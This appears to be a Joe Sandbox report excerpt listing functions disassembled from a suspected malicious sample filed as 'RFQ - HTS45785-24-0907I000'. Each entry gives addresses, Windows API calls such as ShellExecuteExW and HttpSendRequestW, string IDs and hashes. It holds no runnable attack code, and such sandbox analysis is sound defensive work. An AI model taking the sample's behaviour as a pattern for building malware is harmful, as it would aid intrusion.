                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                        Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                        • String ID: <$@
                                                        • API String ID: 2417854910-1426351568
                                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                        Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3705125965-3916222277
                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                        Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem
                                                        • String ID: 0
                                                        • API String ID: 135850232-4108050209
                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                        Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                        Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: AU3_GetPluginDetails
                                                        • API String ID: 145871493-4132174516
                                                        • Opcode ID: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                        • Opcode Fuzzy Hash: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                        Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                        Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 3375834691-2298589950
                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                        Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: $<
                                                        • API String ID: 4104443479-428540627
                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                        Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID: \VH
                                                        • API String ID: 1682464887-234962358
                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                        Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID: \VH
                                                        • API String ID: 1682464887-234962358
                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                        Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID: \VH
                                                        • API String ID: 1682464887-234962358
                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                        Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: \VH
                                                        • API String ID: 2507767853-234962358
                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                        Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: \VH
                                                        • API String ID: 2507767853-234962358
                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                        Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                        Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
